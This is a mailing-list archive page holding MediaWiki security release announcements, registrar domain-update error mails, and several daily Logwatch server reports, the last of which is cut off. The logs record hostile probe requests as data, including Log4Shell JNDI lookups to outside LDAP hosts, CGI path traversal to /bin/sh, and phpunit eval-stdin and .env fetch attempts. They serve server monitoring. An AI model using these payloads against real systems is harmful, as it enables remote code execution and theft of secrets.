Dezember 2021 - TOPF

[MediaWiki-announce] Security and maintenance release: 1.35.5 / 1.36.3 / 1.37.1

by Sam Reed

I would like to announce the release of MediaWiki 1.35.5, 1.36.3 and 1.37.1! This release fixes multiple high severity authorization bypasses in MediaWiki core that both allow for reading private wikis and editing arbitrary pages on any wiki. If you do not have time to upgrade right away, please set the following at the bottom of your LocalSettings.php to disable the vulnerable code immediately: $wgActions['mcrundo'] = false; $wgActions['mcrrestore'] = false; $wgWhitelistRead = []; $wgWhitelistReadRegexp = []; This will also work for vulnerable end-of-life MediaWiki versions that do not have a patch available. A more detailed FAQ about these issues is available at https://www.mediawiki.org/wiki/2021-12_security_release/FAQ These releases also serve as a maintenance release for these branches. Note that the patches are much larger than recent previous security and maintenance releases. This is due to the re-introduction of translation backports. These include the export of new languages that have met the translation threshold in the development branch of MediaWiki. These translation updates are for both MediaWiki core and the bundled skins and extensions. In the case of MediaWiki 1.35, this is translation updates going back 18 months, hence the size of the patch. While tarballs have already been uploaded as of this e-mail, git tags will follow later on today. An "MediaWiki Extensions Security Release Supplement" e-mail will follow this one, covering security updates for non-bundled extensions. Finally, a big thanks to all those involved in reporting, investigating and fixing these issues. == Security fixes == * (T292763. CVE-2021-44854) REST API incorrectly publicly caches autocomplete search results from private wikis. * (T271037, CVE-2021-44856) Title blocked in AbuseFilter can be created via Special:ChangeContentModel. * (T297322, CVE-2021-44857) Unauthorized users can use action=mcrundo to replace the content of arbitrary pages. * (T297322, CVE-2021-44858) Unauthorized users can view contents of private wikis using various actions. * (T297574, CVE-2021-45038) Unauthorized users can access private wiki contents using rollback action === Extension security fixes === * (T293589, CVE-2021-44855) Blind Stored XSS in VisualEditor media dialog. * (T294686) Special:Nuke doesn't actually delete pages. == Links to all mentioned tasks == * https://phabricator.wikimedia.org/T294686 * https://phabricator.wikimedia.org/T297322 * https://phabricator.wikimedia.org/T293589 * https://phabricator.wikimedia.org/T292763 * https://phabricator.wikimedia.org/T271037 == Release notes == Full release notes for 1.35.5: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_35/RELEASE-NOT... https://www.mediawiki.org/wiki/Release_notes/1.35 Full release notes for 1.36.3: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_36/RELEASE-NOT... https://www.mediawiki.org/wiki/Release_notes/1.36 Full release notes for 1.37.1: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_37/RELEASE-NOT... https://www.mediawiki.org/wiki/Release_notes/1.37 For information about how to upgrade, see <https://www.mediawiki.org/wiki/Manual:Upgrading> ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.tar.gz https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.zip Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.tar.gz https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.zip Patch to previous version (1.36.2): https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.gz https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.zip GPG signatures: https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.tar.g... https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.zip.sig https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.zip.sig https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.gz.sig https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.zip.sig Public keys: https://www.mediawiki.org/keys/keys.html ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.tar.gz https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.zip Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.tar.gz https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.zip Patch to previous version (1.37.0): https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.gz https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.zip GPG signatures: https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.tar.g... https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.zip.sig https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.zip.sig https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.gz.sig https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.zip.sig Public keys: https://www.mediawiki.org/keys/keys.html ********************************************************************** Download: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.tar.gz https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.zip Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.tar.gz https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.zip Patch to previous version (1.35.4): https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.gz https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.zip GPG signatures: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.tar.g... https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.zip.sig https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.zip.sig https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.gz.sig https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.zip.sig Public keys: https://www.mediawiki.org/keys/keys.html _______________________________________________ MediaWiki-announce mailing list -- mediawiki-announce(a)lists.wikimedia.org To unsubscribe send an email to mediawiki-announce-leave(a)lists.wikimedia.org

3 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Wed Dec 15 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-14 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 25:25 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 7 sites probed the server 104.45.194.225 139.162.145.250 18.189.180.116 23.225.163.201 34.96.130.17 66.240.205.34 71.6.199.23 Requests with error response codes 400 Bad Request null: 15 Time(s) mstshash=Domain: 6 Time(s) /: 3 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 3 Time(s) /config/getuser?index=0: 3 Time(s) /bag2: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) Z,j\xC8\x18\x1A: 1 Time(s) zapf.in: 1 Time(s) 500 Internal Server Error /: 31 Time(s) /robots.txt: 4 Time(s) /.env: 3 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /favicon.ico: 2 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /.git/config: 1 Time(s) /.well-known/security.txt: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /HNAP1: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /console/: 1 Time(s) /evox/about: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /nmaplowercheck1639504127: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) /sdk: 1 Time(s) /sitemap.xml: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (47.156.250.168): 34 Time(s) root (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 32 Time(s) root (1.116.87.135): 31 Time(s) unknown (186.67.248.6): 23 Time(s) root (219.147.74.48): 21 Time(s) root (218.25.140.72): 19 Time(s) unknown (219.147.74.48): 19 Time(s) unknown (1.116.87.135): 18 Time(s) root (191.209.88.62): 17 Time(s) root (254.177.229.35.bc.googleusercontent.com): 17 Time(s) root (ec2-15-206-158-208.ap-south-1.compute.amazonaws.com): 16 Time(s) unknown (47.156.250.168): 16 Time(s) unknown (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 16 Time(s) root (138.197.203.168): 13 Time(s) unknown (138.197.203.168): 10 Time(s) unknown (218.25.140.72): 9 Time(s) unknown (191.209.88.62): 8 Time(s) root (186.67.248.6): 7 Time(s) root (p578ac460.dip0.t-ipconnect.de): 7 Time(s) root (96.78.175.36): 6 Time(s) unknown (ec2-15-206-158-208.ap-south-1.compute.amazonaws.com): 6 Time(s) root (148.102.25.170): 4 Time(s) unknown (254.177.229.35.bc.googleusercontent.com): 4 Time(s) unknown (96.78.175.36): 4 Time(s) root (161.35.201.142): 2 Time(s) unknown (124.43.64.13): 2 Time(s) unknown (148.102.25.170): 2 Time(s) unknown (221.163.103.143): 2 Time(s) unknown (65.78.98.124): 2 Time(s) root (117.33.128.218): 1 Time(s) root (164.90.203.55): 1 Time(s) root (218.14.208.90): 1 Time(s) unknown (141.98.10.63): 1 Time(s) unknown (185.165.171.175): 1 Time(s) unknown (185.220.102.242): 1 Time(s) unknown (205.185.124.178): 1 Time(s) unknown (218.14.208.90): 1 Time(s) unknown (31.184.198.71): 1 Time(s) unknown (36.110.142.212): 1 Time(s) unknown (92.255.85.37): 1 Time(s) unknown (kalium.0x49.net): 1 Time(s) Invalid Users: Unknown Account: 150 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 4 Miscellaneous warnings 8.362K Bytes accepted 8,563 8.362K Bytes sent via SMTP 8,563 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 4 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 4 Total 4xx Rejects 100.00% ======== ================================================== 47 Connections 39 Connections lost (inbound) 47 Disconnections 1 Removed from queue 1 Sent via SMTP 21 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 1.116.87.135: 31 times 15.206.158.208 (ec2-15-206-158-208.ap-south-1.compute.amazonaws.com): 16 times 35.229.177.254 (254.177.229.35.bc.googleusercontent.com): 17 times 47.156.250.168: 34 times 87.138.196.96 (p578ac460.dip0.t-ipconnect.de): 7 times 96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 6 times 117.33.128.218: 1 time 138.197.203.168: 13 times 148.102.25.170: 4 times 161.35.201.142: 2 times 161.189.131.226 (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 32 times 164.90.203.55: 1 time 186.67.248.6: 7 times 191.209.88.62 (191-209-88-62.user.vivozap.com.br): 17 times 218.14.208.90: 1 time 218.25.140.72: 19 times 219.147.74.48: 21 times Illegal users from: 2001:470:1:c84::25: 1 time undef: 116 times 1.116.87.135: 18 times 15.206.158.208 (ec2-15-206-158-208.ap-south-1.compute.amazonaws.com): 6 times 31.184.198.71: 1 time 35.229.177.254 (254.177.229.35.bc.googleusercontent.com): 4 times 36.110.142.212: 1 time 47.156.250.168: 16 times 65.49.20.66 (scan-17.shadowserver.org): 1 time 65.78.98.124 (65-78-98-124.s4730.c3-0.smt-ubr1.atw-smt.pa.cable.rcncustomer.com): 2 times 92.255.85.37: 1 time 96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 4 times 124.43.64.13: 2 times 138.197.203.168: 10 times 141.98.10.63: 1 time 148.102.25.170: 2 times 152.32.170.230: 1 time 161.189.131.226 (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 16 times 185.165.171.175: 1 time 185.220.102.242 (185-220-102-242.torservers.net): 1 time 186.67.248.6: 23 times 191.209.88.62 (191-209-88-62.user.vivozap.com.br): 8 times 198.98.53.212 (kalium.0x49.net): 1 time 205.185.124.178: 1 time 218.14.208.90: 1 time 218.25.140.72: 9 times 219.147.74.48: 19 times 221.163.103.143: 2 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

3 Jahre, 10 Monate

1
0
0 / 0

DOMAIN studienreform-forum.de UPDATE FAILED

by InterNetworX DomRobot

DOMAIN: studienreform-forum.de REGISTRY-MESSAGE: > RESULT: failed > STID: 9e79a740-5d37-11ec-b747-9f4fcacaa9cc > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns4.inwx.com./2a02:d500:0:0:0:0:0:53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./2001:67c:1bc:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./176.97.158.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./192.174.68.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns3.inwx.eu./45.87.158.53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./2001:67c:10b8:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > WARNING: 33300102912 Predelegation Check warning [WARNING: 113 Primary Master (MNAME) inconsistent across SOA records (master) (\[ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.zapf.in.\])] ----------------------------------------------------------------------------------- DOMAIN UPDATE FAILED -----------------------------------------------------------------------------------

3 Jahre, 10 Monate

1
0
0 / 0

DOMAIN studienreform-forum.de UPDATE FAILED

by InterNetworX DomRobot

DOMAIN: studienreform-forum.de REGISTRY-MESSAGE: > RESULT: failed > STID: f5916819-5d1b-11ec-b747-9f4fcacaa9cc > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns3.inwx.eu./2a02:d500:0:0:0:0:0:53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./2001:67c:1bc:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./176.97.158.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.zapf.in./94.130.65.175\, \[ns2.inwx.de\, ns.zapf.in\, ns.inwx.de\, ns3.inwx.eu\, ns4.inwx.com\, ns5.inwx.net\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./192.174.68.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns3.inwx.eu./45.87.158.53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./2001:67c:10b8:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])] > WARNING: 33300102912 Predelegation Check warning [WARNING: 113 Primary Master (MNAME) inconsistent across SOA records (master) (\[ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.zapf.in.\])] ----------------------------------------------------------------------------------- DOMAIN UPDATE FAILED -----------------------------------------------------------------------------------

3 Jahre, 10 Monate

1
0
0 / 0

DOMAIN studienreform-forum.de TRANSFER SUCCESSFUL

by InterNetworX DomRobot

DOMAIN: studienreform-forum.de REGISTRY-MESSAGE: > RESULT: success > STID: 89f186a3-5d1b-11ec-b747-9f4fcacaa9cc ----------------------------------------------------------------------------------- TRANSFER SUCCESSFUL - WE RECEIVED AN ACK FOR YOUR REQUEST -----------------------------------------------------------------------------------

3 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Tue Dec 14 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-13 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 23:23 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 112.94.253.176 -> zapf.wiki:443: 1 Time(s) 223.167.74.215 -> zapf.wiki:443: 1 Time(s) 45.81.235.112 -> 45.81.235.214:4444: 9 Time(s) 60.191.125.35 -> zapf.wiki:443: 1 Time(s) A total of 3 sites probed the server 159.65.36.205 61.219.11.151 66.240.205.34 Requests with error response codes 400 Bad Request 45.81.235.214:4444: 9 Time(s) null: 4 Time(s) zapf.wiki:443: 3 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s) /config/getuser?index=0: 2 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 2 Time(s) mstshash=Administr: 2 Time(s) mstshash=Domain: 2 Time(s) /: 1 Time(s) /.git/config: 1 Time(s) /aaa9: 1 Time(s) /aab9: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s) 404 Not Found /berlin/apple-touch-icon.png: 1 Time(s) 500 Internal Server Error /: 22 Time(s) /robots.txt: 4 Time(s) /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D: 2 Time(s) /.env: 2 Time(s) //QeeB: 2 Time(s) /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D: 1 Time(s) /.git/config: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /_profiler/phpinfo: 1 Time(s) /aaa9: 1 Time(s) /aab9: 1 Time(s) /actuator/health: 1 Time(s) /bag2: 1 Time(s) /console/: 1 Time(s) /debug/default/view?panel=config: 1 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (121.4.179.91): 38 Time(s) root (106.12.86.8): 37 Time(s) root (168.194.162.142): 37 Time(s) root (167.71.233.95): 35 Time(s) root (139.59.228.214): 33 Time(s) root (203.176.78.120): 33 Time(s) root (119.82.135.226): 30 Time(s) root (139.155.35.47): 25 Time(s) root (49.232.138.121): 21 Time(s) root (143.110.212.213): 19 Time(s) unknown (139.155.35.47): 17 Time(s) unknown (139.59.228.214): 17 Time(s) root (124.152.213.64): 16 Time(s) unknown (167.71.233.95): 15 Time(s) unknown (203.176.78.120): 15 Time(s) unknown (106.12.86.8): 13 Time(s) unknown (168.194.162.142): 13 Time(s) unknown (119.82.135.226): 11 Time(s) unknown (143.110.212.213): 11 Time(s) unknown (124.152.213.64): 9 Time(s) unknown (49.232.138.121): 9 Time(s) unknown (121.4.179.91): 7 Time(s) unknown (193.169.254.138): 2 Time(s) unknown (221.147.61.84): 2 Time(s) root (1.37.33.24): 1 Time(s) root (164.90.203.55): 1 Time(s) root (167.71.10.210): 1 Time(s) root (180.254.73.75): 1 Time(s) root (193.169.254.138): 1 Time(s) root (223.99.170.130): 1 Time(s) unknown (211.76.125.186): 1 Time(s) unknown (45.141.84.10): 1 Time(s) unknown (synprobe001.leakix.net): 1 Time(s) unknown (vmi744046.contaboserver.net): 1 Time(s) Invalid Users: Unknown Account: 145 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 6 Miscellaneous warnings 8.927K Bytes accepted 9,141 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 17 Connections 9 Connections lost (inbound) 17 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 1.37.33.24: 1 time 49.232.138.121: 21 times 106.12.86.8: 37 times 119.82.135.226 (static.cmcti.vn): 30 times 121.4.179.91: 38 times 124.152.213.64: 16 times 139.59.228.214: 33 times 139.155.35.47: 25 times 143.110.212.213: 19 times 164.90.203.55: 1 time 167.71.10.210: 1 time 167.71.233.95: 35 times 168.194.162.142 (142.162.194.168.rfc6598.dynamic.copelfibra.com.br): 37 times 180.254.73.75: 1 time 193.169.254.138: 1 time 203.176.78.120: 33 times 223.99.170.130: 1 time Illegal users from: 2001:470:1:c84::20: 1 time undef: 109 times 45.88.188.13 (vmi744046.contaboserver.net): 1 time 45.141.84.10: 1 time 49.232.138.121: 9 times 65.49.20.66 (scan-17.shadowserver.org): 1 time 106.12.86.8: 13 times 119.82.135.226 (static.cmcti.vn): 11 times 121.4.179.91: 7 times 124.152.213.64: 9 times 139.59.228.214: 17 times 139.155.35.47: 17 times 143.110.212.213: 11 times 167.71.13.196 (synprobe001.leakix.net): 1 time 167.71.233.95: 15 times 168.194.162.142 (142.162.194.168.rfc6598.dynamic.copelfibra.com.br): 13 times 193.169.254.138: 2 times 203.176.78.120: 15 times 211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time 221.147.61.84: 2 times **Unmatched Entries** Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

3 Jahre, 10 Monate

1
0
0 / 0

[MediaWiki-announce] Security pre-release announcement: 1.35.5 / 1.36.3 / 1.37.1

by Sam Reed

Hi all, On Wednesday we will be issuing a security and maintenance release to all supported branches of MediaWiki. The new releases will be: - 1.35.5 - 1.36.3 - 1.37.1 This release includes fixes for multiple high severity authorization bypasses in MediaWiki core, it is recommended you patch immediately. A short LocalSettings.php configuration snippet will also be shared to disable the vulnerable functionality if you are unable to patch right away. This snippet should work across all vulnerable MediaWiki versions, including end-of-life ones. In addition to that, this will resolve other issues in MediaWiki core and also includes some fixes previously committed to git, including minor security and hardening patches along with bug fixes included for maintenance reasons. It also fixes 2 issues in MediaWiki tarball bundled extensions. We will make the fixes available in these respective release branches and master. Tarballs will be available for the above mentioned point releases as well. A summary of some of the security fixes that have gone into non-bundled MediaWiki extensions will also follow later. _______________________________________________ MediaWiki-announce mailing list -- mediawiki-announce(a)lists.wikimedia.org To unsubscribe send an email to mediawiki-announce-leave(a)lists.wikimedia.org

3 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Mon Dec 13 04:42:05 2021 Date Range Processed: yesterday ( 2021-Dec-12 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 22:22 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 123.171.247.39 -> zapf.wiki:443: 1 Time(s) 45.148.10.241 -> zapf.wiki:443: 1 Time(s) 45.81.235.112 -> 45.81.235.214:4444: 2 Time(s) 45.93.250.148 -> 45.81.235.214:4444: 1 Time(s) A total of 7 sites probed the server 161.35.230.183 167.172.163.245 167.71.102.181 193.169.253.168 222.186.19.235 223.149.20.71 43.128.204.243 Requests with error response codes 400 Bad Request null: 8 Time(s) mstshash=Administr: 6 Time(s) /: 3 Time(s) 45.81.235.214:4444: 3 Time(s) http://fuwu.sogou.com/404/index.html: 2 Time(s) mstshash=Domain: 2 Time(s) zapf.wiki:443: 2 Time(s) &\xB7xM\xC1\xE2\xF2u5\xD3\x96\x1E\xD8i=1\x ... x09\xC0\x13\xC0: 1 Time(s) /aaa9: 1 Time(s) /aab9: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /config/getuser?index=0: 1 Time(s) /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... LordAJVcFe3AAAf: 1 Time(s) /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s) 10\x05J~uTz\x84\x12_O\xC4FJ\xBD\xD9\xC9w\x ... x09\xC0\x13\xC0: 1 Time(s) \x8A\x94\x81\xF9\xA0\xE5: 1 Time(s) \xBF\x02\x00\x88\x13\x00\x00\x87\x00\x00\x ... 0\x00/\x9E\x16E: 1 Time(s) icap://icap-server.net/server?arg=87: 1 Time(s) z\xA8F\x199\xD0t\xE38\x8BP\xDB\x9CC1_LU\xC ... x09\xC0\x14\xC0: 1 Time(s) 404 Not Found /: 1 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) 499 (undefined) /: 4 Time(s) 500 Internal Server Error /: 16 Time(s) /.env: 4 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /?x=${jndi:ldap://45.155.205.233:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /aaa9: 1 Time(s) /aab9: 1 Time(s) /actuator/health: 1 Time(s) /console/: 1 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s) /favicon.ico: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (58.246.125.198): 39 Time(s) root (061093240018.static.ctinets.com): 33 Time(s) root (183.131.74.242): 28 Time(s) root (101.34.136.222): 27 Time(s) root (42.159.80.91): 19 Time(s) unknown (183.131.74.242): 19 Time(s) unknown (061093240018.static.ctinets.com): 17 Time(s) root (183.82.7.11): 16 Time(s) root (r167-61-52-250.dialup.adsl.anteldata.net.uy): 12 Time(s) unknown (101.34.136.222): 11 Time(s) unknown (58.246.125.198): 11 Time(s) root (45.114.192.154): 10 Time(s) root (119.96.175.156): 9 Time(s) unknown (42.159.80.91): 9 Time(s) root (204.44.68.125): 7 Time(s) unknown (119.96.175.156): 7 Time(s) unknown (183.82.7.11): 7 Time(s) unknown (193.169.254.138): 4 Time(s) unknown (45.114.192.154): 4 Time(s) root (103.93.17.149): 3 Time(s) root (112.216.157.26): 3 Time(s) root (193.169.254.138): 3 Time(s) unknown (112.216.157.26): 3 Time(s) unknown (204.44.68.125): 3 Time(s) unknown (211.45.247.122): 3 Time(s) unknown (120.157.16.17): 2 Time(s) unknown (175.210.240.51): 2 Time(s) unknown (179.43.187.37): 2 Time(s) unknown (220.74.0.120): 2 Time(s) root (103.254.198.67): 1 Time(s) root (161.35.205.46): 1 Time(s) root (164.90.203.55): 1 Time(s) root (2.56.57.186): 1 Time(s) root (211.45.247.122): 1 Time(s) root (45.88.137.253): 1 Time(s) unknown (1.215.195.10): 1 Time(s) unknown 